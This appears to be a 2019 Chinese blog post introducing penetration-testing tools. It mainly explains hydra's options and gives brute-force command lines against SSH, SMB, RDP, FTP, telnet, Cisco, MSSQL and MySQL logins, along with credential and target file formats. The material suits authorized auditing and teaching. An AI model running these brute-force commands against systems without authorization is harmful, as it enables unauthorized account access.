内网渗透(常用工具使用介绍)

微笑、不失礼 提交于 2019-11-28 03:54:33

网络监听:

wireshark

cain

密码爆破:

hydra

参数详解:

-R  根据上一次进度继续破解
-S  使用SSL协议连接
-s  指定端口
-l  指定用户名
-L  指定用户名字典(文件)
-P  指定密码破解
-p  指定密码字典(文件)
-e  空密码探测和使用登录名作为密码以及登录名倒序作为密码(nsr)
-C  用户名可以用:分割(username:password)可以代替 -l  username  -p  password
-o  输出文件
-t  指定多线程数量,默认为16个线程
-vV  显示详细过程
server  目标IP
service  指定服务名(telnet、ftp、http、mysql、ssh)

 使用案例:

破解ssh:
hydra  -L  user.txt  -P  password.txt  -vV  -o  ssh.log  -e  ns   IP    ssh
破解smb:
hydra  -l  administrator -P  password.txt    IP    smb
破解rdp:
hydra   IP   rdp   -l   administrator    -P   password.txt   -V
破解telnet:
hydra   IP   telnet   -l  administrator  -P  password.txt    -t   32   -s  23   -e  ns  -f   -V
破解ftp:
hydra   ftp   IP    -l  administrator  -P  password.txt   -t (默认16线程)   -vV
hydra   ftp   IP    -l  administrator  -P  password.txt  -e   ns   -vV
破解Cisco:
hydra   -P  password.txt    IP  cisco
hydra  -m  cloud   -P  password.txt    10.58.26.98  cisco-enable破解sqlserver密码:hydra.exe  -l  sa  -P  c:\password.txt  192.168.25.26  mssql破解mysql密码:hydra.exe  -l  root  -P  c:\password.txt  192.168.25.26  mysql指定登录名密码的方式,使用 “登录名:密码” 的格式放到文件中指定hydra -C default_accounts.txt ftp://localhost/通过文件来指定攻击目标(可以自定义端口):hydra -l admin -p admin -M targets.txt ftp
default_accounts.txt格式:
admin:password
test:test
foo:bar
targets.txt格式
foo.bar.com
target.com:21
unusual.port.com:2121
default.used.here.com
127.0.0.1
127.0.0.1:2121

sqlmap

beef

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!